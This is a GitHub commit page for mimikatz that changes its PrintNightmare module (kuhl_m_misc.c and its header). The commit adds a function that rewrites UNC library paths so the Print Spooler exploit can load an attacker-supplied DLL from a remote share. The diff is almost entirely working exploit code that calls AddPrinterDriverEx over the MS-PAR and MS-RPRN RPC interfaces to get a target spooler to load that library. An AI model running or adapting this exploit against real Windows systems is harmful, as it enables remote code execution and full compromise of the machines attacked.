Skip to content

Commit

Permalink
[new] mimikatz misc::printnightmare will normalize UNC path for libra…
Browse files Browse the repository at this point in the history 
…ry (\\ to \??\UNC\)
  • Loading branch information
@gentilkiwi
gentilkiwi committed Jul 7, 2021
1 parent b71f27b commit baaa261
Show file tree
Hide file tree
Showing 2 changed files with 44 additions and 22 deletions.
64 changes: 43 additions & 21 deletions mimikatz/modules/kuhl_m_misc.c
View file
Expand Up @@ -1405,8 +1405,8 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
{
RPC_BINDING_HANDLE hBinding;
RPC_STATUS rpcStatus;
LPCWSTR szRemote, szService, szLibrary, szShortLibrary;
LPWSTR szRand1, szName1, szName2, szSystem32, szDriver, szKernelBase, szDriverPath;
LPCWSTR szRemote, szService, szLibrary;
LPWSTR szShortLibrary, szRand1, szName1, szName2, szSystem32, szDriver, szKernelBase;
DRIVER_INFO_2 DriverInfo = {3, NULL,
#if defined(_M_X64) || defined(_M_ARM64)
L"Windows x64"
Expand All @@ -1428,22 +1428,16 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
{
if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL))
{
szShortLibrary = wcsrchr(szLibrary, L'\\');
if(szShortLibrary && *(szShortLibrary + 1))
if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pDataFile, &szShortLibrary))
{
szShortLibrary++;

if(kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_par(hBinding, DriverInfo.pEnvironment, &szSystem32, &szDriver))
{
if(kull_m_string_sprintf(&szKernelBase, L"%skernelbase.dll", szSystem32))
{
kprintf(L"* KernelBase: %s\n", szKernelBase);
if(kull_m_string_sprintf(&szDriverPath, L"%sunidrv.dll", szDriver))
if(kull_m_string_sprintf(&DriverInfo.pDriverPath, L"%sunidrv.dll", szDriver))
{
DriverInfo.pDriverPath = szDriverPath;
DriverInfo.pDataFile = (LPWSTR) szLibrary;
kprintf(L"* DriverPath: %s\n| DataFile : %s (%s)\n", DriverInfo.pDriverPath, DriverInfo.pDataFile, szShortLibrary);

szRand1 = kull_m_string_getRandomGUID();
if(szRand1)
{
Expand All @@ -1463,15 +1457,15 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
}
LocalFree(szRand1);
}
LocalFree(szDriverPath);
LocalFree(DriverInfo.pDriverPath);
}
LocalFree(szKernelBase);
}
LocalFree(szSystem32);
LocalFree(szDriver);
}
LocalFree(DriverInfo.pDataFile);
}
else PRINT_ERROR(L"Unable to get short library name from library path (%s)\n", szLibrary);
}
else if(kull_m_string_args_byName(argc, argv, L"clean", NULL, NULL))
{
Expand All @@ -1494,22 +1488,16 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
{
if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL))
{
szShortLibrary = wcsrchr(szLibrary, L'\\');
if(szShortLibrary && *(szShortLibrary + 1))
if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pDataFile, &szShortLibrary))
{
szShortLibrary++;

if(kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_rprn(DriverInfo.pEnvironment, &szSystem32, &szDriver))
{
if(kull_m_string_sprintf(&szKernelBase, L"%skernelbase.dll", szSystem32))
{
kprintf(L"* KernelBase: %s\n", szKernelBase);
if(kull_m_string_sprintf(&szDriverPath, L"%sunidrv.dll", szDriver))
if(kull_m_string_sprintf(&DriverInfo.pDriverPath, L"%sunidrv.dll", szDriver))
{
DriverInfo.pDriverPath = szDriverPath;
DriverInfo.pDataFile = (LPWSTR) szLibrary;
kprintf(L"* DriverPath: %s\n| DataFile : %s (%s)\n", DriverInfo.pDriverPath, DriverInfo.pDataFile, szShortLibrary);

szRand1 = kull_m_string_getRandomGUID();
if(szRand1)
{
Expand All @@ -1529,13 +1517,14 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
}
LocalFree(szRand1);
}
LocalFree(szDriverPath);
LocalFree(DriverInfo.pDriverPath);
}
LocalFree(szKernelBase);
}
LocalFree(szSystem32);
LocalFree(szDriver);
}
LocalFree(DriverInfo.pDataFile);
}
}
else if(kull_m_string_args_byName(argc, argv, L"clean", NULL, NULL))
Expand All @@ -1554,6 +1543,39 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}

BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
{
BOOL status = FALSE;

if(szLibrary == wcsstr(szLibrary, L"\\\\"))
{
status = kull_m_string_sprintf(pszNormalizedLibrary, L"\\??\\UNC%s", szLibrary + 1);
}
else
{
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
}

if(status)
{
status = FALSE;
*pszShortLibrary = wcsrchr(*pszNormalizedLibrary, L'\\');
if(*pszShortLibrary && *(*pszShortLibrary + 1))
{
(*pszShortLibrary)++;
status = TRUE;
}
else
{
PRINT_ERROR(L"Unable to get short library name from library path (%s)\n", *pszNormalizedLibrary);
LocalFree(*pszNormalizedLibrary);
}
}
else PRINT_ERROR_AUTO(L"kull_m_string_sprintf/kull_m_string_copy");

return status;
}

void kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete)
{
DWORD ret, i, cReturned = 0;
Expand Down
2 changes: 1 addition & 1 deletion mimikatz/modules/kuhl_m_misc.h
View file
Expand Up @@ -48,11 +48,11 @@ NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);

BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
void kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete);
BOOL kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, LPWSTR *szSystem32, LPWSTR *szDriver);
DWORD kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_par(handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, LPCWSTR szSystem32, LPCWSTR pConfigFile);
BOOL kuhl_m_misc_printnightmare_CallEnumPrinters_par(handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned);

void kuhl_m_misc_printnightmare_CallEnumPrintersAndMaybeDelete_rprn(LPCWSTR szEnvironment, BOOL bIsDelete);
BOOL kuhl_m_misc_printnightmare_CallEnumPrintersAndFindSuitablePath_rprn(LPCWSTR szEnvironment, LPWSTR *szSystem32, LPWSTR *szDriver);
DWORD kuhl_m_misc_printnightmare_CallAddPrinterDriverEx_rprn(PDRIVER_INFO_2 pInfo2, LPCWSTR szSystem32, LPCWSTR pConfigFile);
Expand Down

0 comments on commit baaa261

Please sign in to comment.